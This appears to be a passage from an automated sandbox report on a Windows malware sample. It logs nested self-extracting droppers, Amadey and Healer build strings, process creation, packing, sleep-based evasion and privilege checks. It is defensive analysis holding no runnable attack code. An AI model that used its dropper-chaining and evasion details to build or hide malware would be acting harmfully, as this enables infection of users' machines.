                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_00402F896_2_00402F89
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_00402B906_2_00402B90
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004073A06_2_004073A0
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_02DC0DB06_2_02DC0DB0
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: String function: 0040E1D8 appears 44 times
                Source: plEnknXWQD.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 907046 bytes, 2 files, at 0x2c +A "will6283.exe" +A "ry40VI69.exe", ID 1992, number 1, 34 datablocks, 0x1503 compression
                Source: will6283.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 716290 bytes, 2 files, at 0x2c +A "will3629.exe" +A "qs5212ER.exe", ID 1969, number 1, 28 datablocks, 0x1503 compression
                Source: will3629.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 567826 bytes, 2 files, at 0x2c +A "will3971.exe" +A "py81WM70.exe", ID 1993, number 1, 24 datablocks, 0x1503 compression
                Source: will3971.exe.2.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 205746 bytes, 2 files, at 0x2c +A "mx8896IL.exe" +A "ns5251Ks.exe", ID 1957, number 1, 11 datablocks, 0x1503 compression
                Source: plEnknXWQD.exe, 00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs plEnknXWQD.exe
                Source: plEnknXWQD.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs plEnknXWQD.exe
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe 42873B0C5899F64B5F3205A4F3146210CC63152E529C69D6292B037844C81EC4
                Source: py81WM70.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ns5251Ks.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: plEnknXWQD.exeReversingLabs: Detection: 66%
                Source: plEnknXWQD.exeVirustotal: Detection: 52%
                Source: plEnknXWQD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\plEnknXWQD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\plEnknXWQD.exe C:\Users\user\Desktop\plEnknXWQD.exe
                Source: C:\Users\user\Desktop\plEnknXWQD.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                Source: C:\Users\user\Desktop\plEnknXWQD.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeJump to behavior
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00381F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00381F90
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_01061F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_01061F90
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00AC1F90
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_002F1F90
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mx8896IL.exe.logJump to behavior
                Source: C:\Users\user\Desktop\plEnknXWQD.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/10@0/0
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_0038597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0038597D
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_0038597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0038597D
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeCode function: 4_2_00007FF9A56C1B10 ChangeServiceConfigA,4_2_00007FF9A56C1B10
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00384FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00384FE0
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCommand line argument: Kernel32.dll0_2_00382BFB
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCommand line argument: Kernel32.dll1_2_01062BFB
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCommand line argument: Kernel32.dll2_2_00AC2BFB
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCommand line argument: Kernel32.dll3_2_002F2BFB
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCommand line argument: 08A6_2_00413780
                Source: C:\Users\user\Desktop\plEnknXWQD.exeAutomated click: OK
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeAutomated click: OK
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeAutomated click: OK
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: plEnknXWQD.exeStatic file information: File size 1063936 > 1048576
                Source: plEnknXWQD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: plEnknXWQD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: plEnknXWQD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: plEnknXWQD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: plEnknXWQD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: plEnknXWQD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: plEnknXWQD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: plEnknXWQD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wextract.pdb source: plEnknXWQD.exe, will3971.exe.2.dr, will6283.exe.0.dr, will3629.exe.1.dr
                Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: plEnknXWQD.exe, 00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmp, ry40VI69.exe.0.dr
                Source: Binary string: Healer.pdb source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.371166445.0000000007090000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wextract.pdbGCTL source: plEnknXWQD.exe, will3971.exe.2.dr, will6283.exe.0.dr, will3629.exe.1.dr
                Source: Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: will3629.exe, 00000002.00000003.308857846.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, py81WM70.exe.2.dr
                Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: will3971.exe, 00000003.00000003.309941661.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, mx8896IL.exe, 00000004.00000000.310427980.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, mx8896IL.exe.3.dr
                Source: Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: will3971.exe, 00000003.00000003.309941661.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000000.335153117.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, ns5251Ks.exe.3.dr
                Source: Binary string: _.pdb source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000003.346539295.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369340692.0000000002E81000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\zarepot\talotoyuy1\guf.pdb source: will3629.exe, 00000002.00000003.308857846.00000000049B0000.00000004.00000020.00020000.00000000.sdmp, py81WM70.exe.2.dr
                Source: Binary string: Healer.pdbH5 source: ns5251Ks.exe, 00000006.00000003.338894865.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369220126.0000000002D50000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.370344003.0000000004BD1000.00000004.00000800.00020000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.371166445.0000000007090000.00000004.08000000.00040000.00000000.sdmp, ns5251Ks.exe, 00000006.00000002.369448631.0000000004690000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeUnpacked PE file: 6.2.ns5251Ks.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeUnpacked PE file: 6.2.ns5251Ks.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_0038724D push ecx; ret 0_2_00387260
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_0106724D push ecx; ret 1_2_01067260
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC724D push ecx; ret 2_2_00AC7260
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F724D push ecx; ret 3_2_002F7260
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_00423149 push eax; ret 6_2_00423179
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004231C8 push eax; ret 6_2_00423179
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_0040E21D push ecx; ret 6_2_0040E230
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_0041C6BE push ebx; ret 6_2_0041C6BF
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_02DC454E push ecx; retf 6_2_02DC4554
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_02DC4139 push edi; iretd 6_2_02DC414E
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_02E1BAA3 push edi; retf 6_2_02E1BAA4
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_02E18B58 push FFFFFFE1h; ret 6_2_02E18B67
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_0038202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_0038202A
                Source: qs5212ER.exe.1.drStatic PE information: 0xCBA9AC16 [Mon Apr 11 09:21:26 2078 UTC]
                Source: initial sampleStatic PE information: section name: .text entropy: 7.842085736950787
                Source: initial sampleStatic PE information: section name: .text entropy: 7.7554731967823
                Source: C:\Users\user\Desktop\plEnknXWQD.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeJump to dropped file
                Source: C:\Users\user\Desktop\plEnknXWQD.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exeJump to dropped file
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00381AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00381AE8
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_01061AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_01061AE8
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00AC1AE8
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,3_2_002F1AE8
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe TID: 5576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe TID: 4360Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                Source: C:\Users\user\Desktop\plEnknXWQD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2575
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2450
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2450
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00385467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00385467
